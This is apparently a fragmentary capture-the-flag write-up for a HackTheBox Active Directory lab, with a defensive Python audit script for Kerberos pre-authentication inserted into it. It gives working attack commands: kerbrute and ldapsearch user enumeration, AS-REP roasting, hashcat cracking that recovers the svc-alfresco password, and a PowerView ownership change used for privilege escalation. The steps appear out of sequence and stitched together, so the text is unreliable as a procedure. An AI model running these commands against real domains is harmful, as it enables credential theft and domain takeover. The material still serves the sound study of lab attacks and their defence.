Save the hash and crack it with hashcat (mode 18200 for AS-REP hashes).
hashcat -m 18200 asreproast.hashes /usr/share/wordlists/rockyou.txt --force
Result: s3rvice (password for svc-alfresco)
Import-Module .\powerview.ps1
Now we have a list of ~30 potential usernames. Instead of password spraying (noisy), we will perform AS-REP Roasting.
What is it?
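If a user has the DONT_REQ_PREAUTH flag set (Kerberos pre-authentication disabled), we can request an AS-REP for that account without knowing its password. Part of the reply is encrypted with a key derived from the user's password, so we can crack it offline like a hash.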
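From the defender's side, the same flag can be audited before it is abused. The Python below is an added example, not part of the original writeup: it parses ldapsearch-style LDIF and reports accounts whose userAccountControl has the DONT_REQ_PREAUTH bit (0x400000) set. The sample entries, the example.local names and the function names are constructed for illustration.

```python
UF_ACCOUNTDISABLE = 0x00000002
UF_DONT_REQUIRE_PREAUTH = 0x00400000  # 4194304, shown as DONT_REQ_PREAUTH

# Server-side equivalent of this audit, using the LDAP bitwise-AND matching rule.
LDAP_FILTER = "(&(objectCategory=person)(userAccountControl:1.2.840.113556.1.4.803:=4194304))"

# Constructed sample, shaped like ldapsearch output for two attributes.
SAMPLE_LDIF = """\
dn: CN=svc-example,OU=Service Accounts,DC=example,DC=local
sAMAccountName: svc-example
userAccountControl: 4260352

dn: CN=Alice Example,CN=Users,DC=example,DC=local
sAMAccountName: alice
userAccountControl: 512

dn: CN=Old Service,CN=Users,DC=example,
 DC=local
sAMAccountName: old-svc
userAccountControl: 4194818
"""

def parse_ldif(text):
    """Return one {attribute: value} dict per entry (base64 '::' values are not decoded)."""
    unfolded = []
    for line in text.splitlines():
        if line.startswith(" ") and unfolded:
            unfolded[-1] += line[1:]  # LDIF folds long lines with one leading space
        else:
            unfolded.append(line)
    entries, current = [], {}
    for line in unfolded + [""]:  # trailing blank flushes the last entry
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
        elif not line.startswith("#") and ": " in line:
            key, value = line.split(": ", 1)
            current.setdefault(key, value)
    return entries

def find_preauth_disabled(entries):
    """Return (sAMAccountName, account_enabled) for each entry with the flag set."""
    findings = []
    for e in entries:
        raw = e.get("userAccountControl", "")
        if raw.isdigit() and int(raw) & UF_DONT_REQUIRE_PREAUTH:
            enabled = not (int(raw) & UF_ACCOUNTDISABLE)
            findings.append((e.get("sAMAccountName", e.get("dn", "?")), enabled))
    return findings
```

Enabled accounts in the result are the ones to fix first, either by re-enabling pre-authentication or, where that is not possible, by giving the account a long random password.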
Use enum4linux or impacket-GetADUsers to list domain users.
impacket-GetADUsers -dc-ip 10.10.10.161 htb.local/
Alternatively, use kerbrute to brute-force usernames from a wordlist:
kerbrute userenum --dc 10.10.10.161 -d htb.local /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
For efficiency, we can also use ldapsearch:
ldapsearch -x -H ldap://10.10.10.161 -b "CN=Users,DC=htb,DC=local" | grep sAMAccountName
Users found: svc-alfresco, sebastien, lucinda, andy, mark, santi.
Set-DomainObjectOwner -Identity "Exchange Windows Permissions" -OwnerIdentity "svc-alfresco"